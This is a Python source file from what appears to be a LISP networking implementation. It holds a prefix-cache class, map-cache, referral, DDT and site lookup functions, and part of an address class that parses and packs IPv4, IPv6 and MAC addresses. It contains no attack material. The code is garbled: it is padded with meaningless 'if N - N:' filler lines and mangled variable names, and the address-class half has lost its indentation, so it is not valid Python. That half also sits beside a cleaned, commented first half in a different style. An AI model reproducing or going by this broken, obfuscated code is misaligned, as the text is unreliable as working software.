        self.entries, self.entries_sorted = {}, []
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
class lisp_cache ( ) :
    """Prefix cache keyed by mask-length buckets, each holding entries
    keyed by an instance-id/AFI/address string. Supports exact and
    longest-match lookups; used for the map-cache, referral cache,
    site cache and database-mappings.

    Python-3 compatibility fix: the Python-2-only dict.has_key() calls
    are replaced with the `in` operator (works on both 2 and 3).
    """
    def __init__ ( self ) :
        self.cache = {}          # mask-length -> lisp_cache_entries bucket
        self.cache_sorted = []   # sorted list of mask-length keys
        self.cache_count = 0     # total entries across all buckets

    def cache_size ( self ) :
        """Return the total number of cached entries."""
        return (self.cache_count)

    def build_key ( self , prefix ) :
        """Return [mask-length, key-string] for `prefix`.

        Real AFIs get mask_len + 48 — apparently to sort after the
        pseudo-AFI ultimate-root (0) and IID-range buckets (TODO
        confirm rationale). The key string is instance-id + AFI +
        address, all hex-encoded where binary.
        """
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
            ml = 0
        elif (prefix.afi == LISP_AFI_IID_RANGE):
            ml = prefix.mask_len
        else:
            ml = prefix.mask_len + 48

        iid = lisp_hex_string(prefix.instance_id).zfill(8)
        afi = lisp_hex_string(prefix.afi).zfill(4)

        if (prefix.afi > 0):
            if (prefix.is_binary()):
                length = prefix.addr_length() * 2
                addr = lisp_hex_string(prefix.address).zfill(length)
            else:
                addr = prefix.address
        elif (prefix.afi == LISP_AFI_GEO_COORD):
            afi = "8003"
            addr = prefix.address.print_geo()
        else:
            afi = ""
            addr = ""

        key = iid + afi + addr
        return ([ml, key])

    def add_cache ( self , prefix , entry ) :
        """Insert `entry` under `prefix`, replacing any existing entry.

        Host bits of a binary prefix are zeroed in place first so keys
        are canonical.
        """
        if (prefix.is_binary()): prefix.zero_host_bits()
        ml, key = self.build_key(prefix)
        if ((ml in self.cache) == False):
            self.cache[ml] = lisp_cache_entries()
            self.cache[ml].entries = {}
            self.cache[ml].entries_sorted = []
            self.cache_sorted = sorted(self.cache)

        if ((key in self.cache[ml].entries) == False):
            self.cache_count += 1

        self.cache[ml].entries[key] = entry
        self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)

    def lookup_cache ( self , prefix , exact ) :
        """Look up `prefix` in the cache.

        exact=True returns the entry stored under exactly this prefix,
        or None. exact=False returns the best covering entry: buckets
        are scanned in ascending mask-length order and the last entry
        that `prefix` is more-specific than wins (longest match).
        """
        ml, key = self.build_key(prefix)
        if (exact):
            if ((ml in self.cache) == False): return (None)
            if ((key in self.cache[ml].entries) == False): return (None)
            return (self.cache[ml].entries[key])

        found = None
        for bucket_ml in self.cache_sorted:
            # Buckets with a larger mask-length than the prefix itself
            # cannot contain a covering (less-specific) match.
            if (ml < bucket_ml): return (found)
            for entry_key in self.cache[bucket_ml].entries_sorted:
                entries = self.cache[bucket_ml].entries
                if (entry_key in entries):
                    entry = entries[entry_key]
                    if (entry == None): continue
                    if (prefix.is_more_specific(entry.eid)): found = entry
        return (found)

    def delete_cache ( self , prefix ) :
        """Remove the entry stored under `prefix`, if present."""
        ml, key = self.build_key(prefix)
        if ((ml in self.cache) == False): return
        if ((key in self.cache[ml].entries) == False): return
        self.cache[ml].entries.pop(key)
        self.cache[ml].entries_sorted.remove(key)
        self.cache_count -= 1

    def walk_cache ( self , function , parms ) :
        """Call function(entry, parms) for every entry in sorted order.

        The callback returns (keep_going, parms); iteration stops early
        when keep_going is False. Returns the final parms.
        """
        for ml in self.cache_sorted:
            for key in self.cache[ml].entries_sorted:
                entry = self.cache[ml].entries[key]
                keep_going, parms = function(entry, parms)
                if (keep_going == False): return (parms)
        return (parms)

    def print_cache ( self ) :
        """Log the entire cache contents (debugging aid)."""
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint(" Cache is empty")
            return

        for ml in self.cache_sorted:
            for key in self.cache[ml].entries_sorted:
                entry = self.cache[ml].entries[key]
                lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
                    entry))
if 10 - 10: I1ii11iIi11i % ooOoO0o * IiII - iIii1I11I1II1
if 42 - 42: iII111i
if 96 - 96: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: o0oOOo0O0Ooo
if 23 - 23: ooOoO0o * OoO0O00 + O0 % I1Ii111
if 21 - 21: Ii1I * OoOoOO00
if 29 - 29: iIii1I11I1II1 / ooOoO0o
# Global cache instances (all lisp_cache objects):
lisp_referral_cache = lisp_cache ( )   # DDT referral cache (see lisp_process_map_referral)
lisp_ddt_cache = lisp_cache ( )        # DDT delegation cache
lisp_sites_by_eid = lisp_cache ( )     # registered sites keyed by EID-prefix (used for Map-Notify-Ack auth)
lisp_map_cache = lisp_cache ( )        # EID-to-RLOC map-cache (see lisp_map_cache_lookup)
lisp_db_for_lookups = lisp_cache ( )   # local database-mappings — name suggests; TODO confirm usage
if 75 - 75: OoooooooOO + I1IiiI % OoOoOO00 / O0 - IiII
if 88 - 88: OoO0O00 % Ii1I
if 12 - 12: OoooooooOO . O0
if 33 - 33: OoooooooOO / I11i . II111iiii * i1IIi
if 34 - 34: i11iIiiIii / OoOoOO00
if 100 - 100: o0oOOo0O0Ooo - I1IiiI / I11i
if 43 - 43: o0oOOo0O0Ooo % iIii1I11I1II1
def lisp_map_cache_lookup(source, dest):
    """Longest-match lookup of (source, dest) in the global lisp_map_cache.

    For unicast destinations the destination lookup alone decides. For
    multicast destinations a second, source-specific lookup is done inside
    the matched (*, G) entry. Returns the map-cache entry or None.
    """
    is_group = dest.is_multicast_address()

    #
    # Destination longest-match lookup.
    #
    mc = lisp_map_cache.lookup_cache(dest, False)
    if (mc == None):
        eid_str = source.print_sg(dest) if is_group else dest.print_address()
        eid_str = green(eid_str, False)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    #
    # Unicast: the destination match is the final answer.
    #
    if (is_group == False):
        prefix_str = green(mc.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format(
            green(dest.print_address(), False), prefix_str))
        return(mc)

    #
    # Multicast: refine with a source lookup inside the group entry.
    #
    mc = mc.lookup_source_cache(source, False)
    if (mc == None):
        eid_str = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    prefix_str = green(mc.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format(
        green(source.print_sg(dest), False), prefix_str))
    return(mc)
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
if 86 - 86: OOooOOo / OoooooooOO - IiII
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if 21 - 21: O0 . OoO0O00 * I1ii11iIi11i % iII111i + OoooooooOO
if 8 - 8: oO0o * iII111i * I11i
if 30 - 30: I1Ii111
def lisp_referral_cache_lookup(eid, group, exact):
    """Look up (eid, group) in the global lisp_referral_cache.

    A null (or absent) group means a unicast lookup on eid alone. For
    (S, G) lookups the group entry is found first and then refined with a
    source lookup; when 'exact' is set only a full source match counts.
    Returns the referral entry or None.
    """
    if (group and group.is_null()):
        return(lisp_referral_cache.lookup_cache(eid, exact))

    if (eid == None or eid.is_null()): return(None)

    #
    # (S, G) lookup: group first, then the source inside it.
    #
    referral = lisp_referral_cache.lookup_cache(group, exact)
    if (referral == None): return(None)

    source_entry = referral.lookup_source_cache(eid, exact)
    if (source_entry): return(source_entry)

    if (exact): referral = None
    return(referral)
if 74 - 74: II111iiii
if 91 - 91: oO0o % II111iiii / I1ii11iIi11i
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
if 99 - 99: OOooOOo
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
def lisp_ddt_cache_lookup(eid, group, exact):
    """Look up (eid, group) in the global lisp_ddt_cache.

    A null group means a unicast lookup on eid alone. For (S, G) lookups
    the group entry is found first and then refined with a source lookup;
    when 'exact' is set only a full source match counts. Returns the DDT
    entry or None.
    """
    if (group.is_null()):
        return(lisp_ddt_cache.lookup_cache(eid, exact))

    if (eid.is_null()): return(None)

    #
    # (S, G) lookup: group first, then the source inside it.
    #
    ddt = lisp_ddt_cache.lookup_cache(group, exact)
    if (ddt == None): return(None)

    source_entry = ddt.lookup_source_cache(eid, exact)
    if (source_entry): return(source_entry)

    if (exact): ddt = None
    return(ddt)
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
if 71 - 71: OOooOOo
if 27 - 27: OOooOOo * O0 * i11iIiiIii / OoOoOO00 - i1IIi
if 73 - 73: iII111i / I1IiiI * ooOoO0o
if 85 - 85: I11i + I11i + oO0o - OoOoOO00
if 15 - 15: OoO0O00
if 88 - 88: Ii1I % i1IIi / I1Ii111
def lisp_site_eid_lookup(eid, group, exact):
    """Look up (eid, group) in the global lisp_sites_by_eid table.

    A null group means a unicast lookup on eid alone. For (S, G) lookups
    the group entry is found first, then refined with a source lookup.
    On a non-exact miss of the source, the group match may be replaced by
    its parent when that parent accepts more-specific registrations and
    the group falls under the parent's group. Returns the site entry or
    None.
    """
    if (group.is_null()):
        return(lisp_sites_by_eid.lookup_cache(eid, exact))

    if (eid.is_null()): return(None)

    #
    # (S, G) lookup: group first, then the source inside it.
    #
    site = lisp_sites_by_eid.lookup_cache(group, exact)
    if (site == None): return(None)

    source_entry = site.lookup_source_cache(eid, exact)
    if (source_entry): return(source_entry)

    if (exact):
        site = None
    else:
        #
        # Fall back to an accept-more-specifics parent when applicable.
        #
        parent = site.parent_for_more_specifics
        if (parent and parent.accept_more_specifics):
            if (group.is_more_specific(parent.group)): site = parent

    return(site)
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
if 60 - 60: i11iIiiIii + IiII
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if 48 - 48: iII111i + Ii1I
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
if 100 - 100: iII111i * iII111i . Oo0Ooo
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
class lisp_address ( ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 48 - 48: ooOoO0o + II111iiii
if 73 - 73: II111iiii
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 66 - 66: o0oOOo0O0Ooo % IiII
if 39 - 39: IiII
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 18 - 18: iII111i % o0oOOo0O0Ooo - i1IIi
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 53 - 53: o0oOOo0O0Ooo + IiII - ooOoO0o % i11iIiiIii - i11iIiiIii - I1Ii111
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 79 - 79: II111iiii + i11iIiiIii . OOooOOo . I11i / iIii1I11I1II1
if 62 - 62: O0
if 52 - 52: OoooooooOO . oO0o
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
O0o00o000oO = self . address
if ( ( ( O0o00o000oO & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( O0o00o000oO & 0xff000000 ) >> 24 ) == 172 ) :
o000O000o0O = ( O0o00o000oO & 0x00ff0000 ) >> 16
if ( o000O000o0O >= 16 and o000O000o0O <= 31 ) : return ( True )
if 62 - 62: O0 . O0 + i11iIiiIii
if ( ( ( O0o00o000oO & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 57 - 57: II111iiii . I1IiiI . OOooOOo / IiII . II111iiii
if 80 - 80: I11i * OoO0O00 + ooOoO0o % ooOoO0o
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 16 - 16: iII111i / i11iIiiIii + iIii1I11I1II1
if 76 - 76: OoooooooOO / Oo0Ooo / I1Ii111 + OoooooooOO
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 65 - 65: Oo0Ooo - I1Ii111
return ( 0 )
if 57 - 57: O0
if 49 - 49: I1ii11iIi11i / OoOoOO00 - I1IiiI + iII111i . OOooOOo % oO0o
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
O0o00o000oO = self . address >> 96
return ( O0o00o000oO == 0x20010005 )
if 34 - 34: OoO0O00 - I1IiiI + OoOoOO00
if 22 - 22: iIii1I11I1II1 . i1IIi . OOooOOo % Oo0Ooo - i1IIi
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 78 - 78: I1IiiI / i1IIi % II111iiii % I1IiiI % Ii1I
return ( 0 )
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
if 38 - 38: IiII . I1Ii111
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 69 - 69: ooOoO0o + OoOoOO00 + II111iiii % I1Ii111 + Ii1I . ooOoO0o
if 73 - 73: I11i % I11i . ooOoO0o + OoOoOO00
def packet_format ( self ) :
if 33 - 33: i11iIiiIii . i11iIiiIii * i11iIiiIii / iIii1I11I1II1 / I1ii11iIi11i . ooOoO0o
if 11 - 11: iII111i
if 60 - 60: I1ii11iIi11i / I1Ii111
if 10 - 10: OoO0O00 * iIii1I11I1II1 / I11i % II111iiii . OoOoOO00 / I1IiiI
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 45 - 45: Ii1I % OOooOOo * Ii1I - iIii1I11I1II1
if 18 - 18: I1Ii111 / Oo0Ooo % Ii1I + OoO0O00
def pack_address ( self ) :
o00OooooOOOO = self . packet_format ( )
ii1i1II = ""
if ( self . is_ipv4 ( ) ) :
ii1i1II = struct . pack ( o00OooooOOOO , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
IiiiI1 = byte_swap_64 ( self . address >> 64 )
I1IIIi = byte_swap_64 ( self . address & 0xffffffffffffffff )
ii1i1II = struct . pack ( o00OooooOOOO , IiiiI1 , I1IIIi )
elif ( self . is_mac ( ) ) :
O0o00o000oO = self . address
IiiiI1 = ( O0o00o000oO >> 32 ) & 0xffff
I1IIIi = ( O0o00o000oO >> 16 ) & 0xffff
o0Ooo0OoOo = O0o00o000oO & 0xffff
ii1i1II = struct . pack ( o00OooooOOOO , IiiiI1 , I1IIIi , o0Ooo0OoOo )
elif ( self . is_e164 ( ) ) :
O0o00o000oO = self . address
IiiiI1 = ( O0o00o000oO >> 32 ) & 0xffffffff
I1IIIi = ( O0o00o000oO & 0xffffffff )
ii1i1II = struct . pack ( o00OooooOOOO , IiiiI1 , I1IIIi )
elif ( self . is_dist_name ( ) ) :
ii1i1II += self . address + "\0"
if 71 - 71: II111iiii
return ( ii1i1II )
if 34 - 34: I1ii11iIi11i * oO0o + OoooooooOO
if 39 - 39: I1IiiI * ooOoO0o / i11iIiiIii - oO0o - oO0o + O0
def unpack_address ( self , packet ) :
o00OooooOOOO = self . packet_format ( )
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 73 - 73: OOooOOo
O0o00o000oO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 44 - 44: I1ii11iIi11i * i1IIi - iIii1I11I1II1 - oO0o - oO0o * II111iiii
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( O0o00o000oO [ 0 ] )
if 98 - 98: Oo0Ooo + ooOoO0o / OOooOOo . iIii1I11I1II1 . I1IiiI . OoOoOO00
elif ( self . is_ipv6 ( ) ) :
if 92 - 92: i1IIi + OoOoOO00 * i1IIi / IiII
if 4 - 4: oO0o % OoO0O00 + IiII + o0oOOo0O0Ooo
if 82 - 82: O0 / I1Ii111 + OOooOOo . IiII + Ii1I
if 31 - 31: i1IIi * OoO0O00 - Ii1I + I11i
if 8 - 8: O0 + i1IIi . O0
if 67 - 67: I1IiiI
if 42 - 42: ooOoO0o - o0oOOo0O0Ooo % oO0o - ooOoO0o
if 87 - 87: OoooooooOO / O0
if ( O0o00o000oO [ 0 ] <= 0xffff and ( O0o00o000oO [ 0 ] & 0xff ) == 0 ) :
OoO0 = ( O0o00o000oO [ 0 ] << 48 ) << 64
else :
OoO0 = byte_swap_64 ( O0o00o000oO [ 0 ] ) << 64
if 94 - 94: oO0o + Ii1I % IiII
iI111 = byte_swap_64 ( O0o00o000oO [ 1 ] )
self . address = OoO0 | iI111
if 62 - 62: iIii1I11I1II1
elif ( self . is_mac ( ) ) :
OOoOO = O0o00o000oO [ 0 ]
OooOOoO = O0o00o000oO [ 1 ]
iii1111iII1 = O0o00o000oO [ 2 ]
self . address = ( OOoOO << 32 ) + ( OooOOoO << 16 ) + iii1111iII1
if 2 - 2: o0oOOo0O0Ooo / O0
elif ( self . is_e164 ( ) ) :
self . address = ( O0o00o000oO [ 0 ] << 32 ) + O0o00o000oO [ 1 ]
if 29 - 29: OOooOOo . OOooOOo * iII111i % OoO0O00
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
oO0o00O = 0
if 66 - 66: Ii1I / OoO0O00 * i11iIiiIii * oO0o . iIii1I11I1II1
packet = packet [ oO0o00O : : ]
return ( packet )
if 16 - 16: Oo0Ooo % IiII * o0oOOo0O0Ooo % OoOoOO00 - OoooooooOO
if 61 - 61: i11iIiiIii - i1IIi + iIii1I11I1II1 * I1IiiI % OoOoOO00 . oO0o
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 24 - 24: iII111i . i1IIi * I1ii11iIi11i
if 1 - 1: oO0o / OoOoOO00 + I1IiiI
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 47 - 47: O0 / OOooOOo . i1IIi / OoooooooOO . IiII
if 34 - 34: OoO0O00 * II111iiii + I1Ii111
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 20 - 20: iIii1I11I1II1 . OoO0O00 . II111iiii / Ii1I - iIii1I11I1II1 / OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if 60 - 60: I11i - OoO0O00 - OoOoOO00 * ooOoO0o - i1IIi
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 18 - 18: ooOoO0o + i11iIiiIii + O0 + OOooOOo / Ii1I
if 65 - 65: I1IiiI . ooOoO0o
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 51 - 51: I1Ii111
if 89 - 89: Oo0Ooo
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 15 - 15: OOooOOo * II111iiii - OOooOOo * iIii1I11I1II1
if 95 - 95: I1Ii111 / OoooooooOO * I11i * OoooooooOO
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 88 - 88: I1IiiI / Oo0Ooo / oO0o + oO0o % OOooOOo + Oo0Ooo
if 63 - 63: o0oOOo0O0Ooo + i11iIiiIii % OOooOOo % iIii1I11I1II1 / I1ii11iIi11i - iII111i
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 72 - 72: iII111i % oO0o . IiII + I1ii11iIi11i . IiII . II111iiii
if 10 - 10: I11i . ooOoO0o + I11i * Ii1I
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 55 - 55: OOooOOo / iII111i + OoooooooOO - OoooooooOO
if 51 - 51: O0 % Ii1I % Oo0Ooo - O0
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 94 - 94: OoooooooOO - ooOoO0o % I1ii11iIi11i + I1Ii111
if 51 - 51: I1ii11iIi11i . iII111i / i1IIi * ooOoO0o % I11i
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 82 - 82: O0 % OoOoOO00 . iII111i . i1IIi . iII111i - Oo0Ooo
if 58 - 58: O0 * OOooOOo
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 60 - 60: ooOoO0o
if 47 - 47: i11iIiiIii
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 21 - 21: i1IIi - oO0o - Oo0Ooo
if 11 - 11: i1IIi
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
return ( False )
if 56 - 56: Ii1I . iII111i
if 76 - 76: I1IiiI / Ii1I % OoOoOO00 + IiII / i11iIiiIii . o0oOOo0O0Ooo
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 31 - 31: oO0o * oO0o % o0oOOo0O0Ooo . O0 + iII111i
if 52 - 52: i11iIiiIii
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 1 - 1: i1IIi * iIii1I11I1II1
if 29 - 29: I11i
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 12 - 12: oO0o % i1IIi - oO0o / ooOoO0o * II111iiii % ooOoO0o
if 6 - 6: IiII / OoO0O00
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 83 - 83: IiII - iIii1I11I1II1 * ooOoO0o - oO0o
if 77 - 77: Ii1I
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 9 - 9: OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
if 56 - 56: iII111i * II111iiii . OoooooooOO . I11i
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
i1i1IIIIIIIi = addr_str . find ( "[" )
Oo0iIIiiIiiI = addr_str . find ( "]" )
if ( i1i1IIIIIIIi != - 1 and Oo0iIIiiIiiI != - 1 ) :
self . instance_id = int ( addr_str [ i1i1IIIIIIIi + 1 : Oo0iIIiiIiiI ] )
addr_str = addr_str [ Oo0iIIiiIiiI + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 59 - 59: I1ii11iIi11i * OoOoOO00 / Ii1I
if 80 - 80: IiII - ooOoO0o / OoOoOO00 / I11i * O0 + oO0o
if 77 - 77: ooOoO0o + I1ii11iIi11i * o0oOOo0O0Ooo / i1IIi * I11i
if 70 - 70: oO0o / iII111i * i1IIi / II111iiii / OoOoOO00 + oO0o
if 30 - 30: i1IIi - iII111i - i11iIiiIii . OoOoOO00 . o0oOOo0O0Ooo
if 74 - 74: i11iIiiIii / II111iiii
if ( self . is_ipv4 ( ) ) :
oOo = addr_str . split ( "." )
Oooo0oOOO0 = int ( oOo [ 0 ] ) << 24
Oooo0oOOO0 += int ( oOo [ 1 ] ) << 16
Oooo0oOOO0 += int ( oOo [ 2 ] ) << 8
Oooo0oOOO0 += int ( oOo [ 3 ] )
self . address = Oooo0oOOO0
elif ( self . is_ipv6 ( ) ) :
if 45 - 45: OoOoOO00 + I1Ii111 + Oo0Ooo
if 73 - 73: OoO0O00 / o0oOOo0O0Ooo % Ii1I * ooOoO0o
if 94 - 94: I1IiiI . iII111i - iIii1I11I1II1 . Oo0Ooo
if 40 - 40: Ii1I
if 26 - 26: OoO0O00 / IiII
if 31 - 31: Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
